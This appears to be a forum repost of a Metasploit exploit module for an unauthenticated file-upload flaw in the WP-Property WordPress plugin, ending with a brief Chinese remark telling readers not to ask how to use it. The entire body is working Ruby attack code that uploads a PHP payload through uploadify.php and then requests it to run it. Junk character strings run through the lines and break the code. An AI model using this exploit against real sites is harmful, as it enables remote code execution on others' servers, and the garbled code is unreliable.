WordPress WP-Property PHP 文件上传漏洞/ ], L3 a# C) w- e
; I4 i3 C8 M4 q) J4 H6 f) ^, l: t* I ## # This file is part of the Metasploit Framework and may be subject to4 V, x& k8 M+ {
& U6 v+ Y3 G. Y# redistribution and commercial restrictions. Please see the Metasploit3 G! {* R: y- y/ l
: W1 f( j+ m' m% h1 k; e# Framework web site for more information on licensing and terms of use.. N8 K- w' o8 J, X& b
* f+ ?3 c& A) h! d' c3 M
# http://metasploit.com/framework/ ##
$ k7 @$ g$ w' G* d1 z
/ f1 [: v9 z$ U9 ~# x5 Y+ R
4 r5 p2 q: Z/ U( _/ t' x
, @6 O, A! Y) s5 v4 c) S( A
, s3 |' U8 t5 B) e2 `8 b7 T6 {# q, d2 ~1 |
require 'msf/core'- v0 h8 q: G6 Z$ ]- a
require 'msf/core/exploit/php_exe'
$ n* F9 c7 H1 v$ n# t
* V8 i6 J7 I" `6 ~3 G( Aclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
: e/ h Q5 A. E0 u'Description' => %q{( H9 V! S6 c1 S# `( O3 F
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
9 Q& t& o+ h4 k2 U2 R[& K8 i) p8 F& r [' z- E
'Sammy FORGIT', # initial discovery8 Q7 b$ I7 x" k4 y
'James Fitts <fitts.james[at]gmail.com>' # metasploit module$ m' u. ^) W% w6 a2 T4 I
],
7 x1 V$ _% J; d# m! I6 W'License' => MSF_LICENSE,9 l# D$ x4 w# q% z9 X' ~" _
'References' =>
0 M- |! u0 I [- a[
. }) m7 z" X$ K7 T[ 'OSVDB', '82656' ],% a2 C& {! Y6 `: [3 C
[ 'BID', '53787' ],
- N' F# Z3 W* X% [% A5 M[ 'EDB', '18987'],
, n0 R, B2 m+ N6 M[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]) {9 z) F5 m4 B* Y
],* ^8 [4 x# Y' O/ ^2 a/ P
'Payload' =>
" {3 r$ K3 i: |{
7 `( S* I( @6 G6 e. j'BadChars' => "\x00",! g* v, V+ y# [% A0 N
},
* f6 n( Y8 F9 b- e& o1 m% }1 m8 |'Platform' => 'php',2 `, l# p% F: T: C
'Arch' => ARCH_PHP,
# G$ _- m: G$ [& N' i- A6 P'Targets' =>+ B% j3 e" `# I$ P8 L5 e
[
; e! a( x+ k+ R1 C! z8 B[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
/ F, I" o3 G' c& e( y/ Z* N[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
/ N9 G9 A, x; V$ y2 v% R5 n],2 c/ Y5 G/ p. K- j! ]' J
'DefaultTarget' => 0,6 d0 X4 d) {# e4 b
'DisclosureDate' => 'Mar 26 2012'))
& S8 U0 U# z1 }7 a' U# |) o7 F9 N. i
register_options(( D4 g* k/ W; P: g
[
9 f- s7 E' J7 P; y( s3 U, IOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
+ g: Q. X- [ U6 `) ]7 ^+ a], self.class)! x0 I( L! H. }4 e
end* x. J+ R: d% m. |+ Y$ {& R
; {1 I, @; Q3 X( j+ ^# Q8 ^def check" v% Y8 ?4 t* f9 p
uri = target_uri.path
' y# p% a* G6 N+ |* _) t H5 ~uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
# @! P" Q" R9 V+ _! b$ k'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
1 e3 V: m2 g( v: K( ]/ s}); I; k! k/ S; F4 c- Z
, N8 @4 c$ |. f/ h5 [if not res or res.code != 200
7 j$ k9 z, b h/ F, M" z6 t3 kreturn Exploit::CheckCode::Unknown" N; d1 O* d5 g6 y7 j
end
, O; P$ o& z$ m9 v; z4 U8 A- H6 W0 L! a3 r- B4 z; t
return Exploit::CheckCode::Appears) U I: y3 C: Y, h, H
end
1 O; R. d2 e0 j. p' L# J; r3 C, A4 ?. C- E( ?, x' v
def exploit+ L6 v/ W2 C3 ?4 b8 l
uri = target_uri.path
5 `" v. q( e' f' [* \) {& Duri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)8 _' T& w& l7 \- w* x$ R
5 h2 z. p; g% D z
data = Rex::MIME::Message.new
% y6 C( {" b( ^ C1 Wdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\""); I( {' z4 a$ f4 g1 b
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
/ H7 E) e; V+ U7 p3 m& Z+ n+ }post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
2 c$ ~) J6 e" @* w. Q: q/ {. g- A
print_status("#{peer} - Uploading payload #{@payload_name}")1 Q1 v( a* P8 B! K7 ?% r) H
res = send_request_cgi({
, G5 Y( p e7 M1 M! H6 `'method' => 'POST',
1 C: T0 w# ~: c'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
' a2 [/ f/ |8 B! X1 A) M'ctype' => "multipart/form-data; boundary=#{data.bound}",( M u7 Q7 W$ t4 d( C7 N
'data' => post_data. P9 Q0 P/ d1 T- z4 X, E! v
})
2 ~9 q' P0 y9 g1 Z4 w. H( L6 u( g: z6 {& X8 `7 } r+ \* c
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
& ?' m3 L. X6 s9 ^fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
3 B3 _0 F/ v" v6 w+ u2 Fend9 o5 w; E6 l4 k3 b( P6 n
1 C# b2 A3 a7 q4 r4 m; T
upload_uri = res.body) O. W. e k$ }* U# c, B% m: B
; i5 @: O; t1 e4 u1 e0 y$ @print_status("#{peer} - Executing payload #{@payload_name}")$ q$ @0 G& O: ^& i- P3 M
res = send_request_raw({8 ^& M; w% x- X! X4 p# e
'uri' => upload_uri,, K6 v1 G! n2 b9 w+ G( ^+ C
'method' => 'GET'
, ^0 G: X% b% m/ K7 S, a})
! ^# `& J# j9 d# i5 Kend+ Y8 \8 w( J% f" r8 U
end; a! u' o; Q/ m1 s% D5 ^: o% J
b: n6 D1 ?: u
不要问我这写的是什么 怎么利用 我是说msf.3 {0 E# _* ^1 r2 J* ]
% j! d* P* n0 e) s
|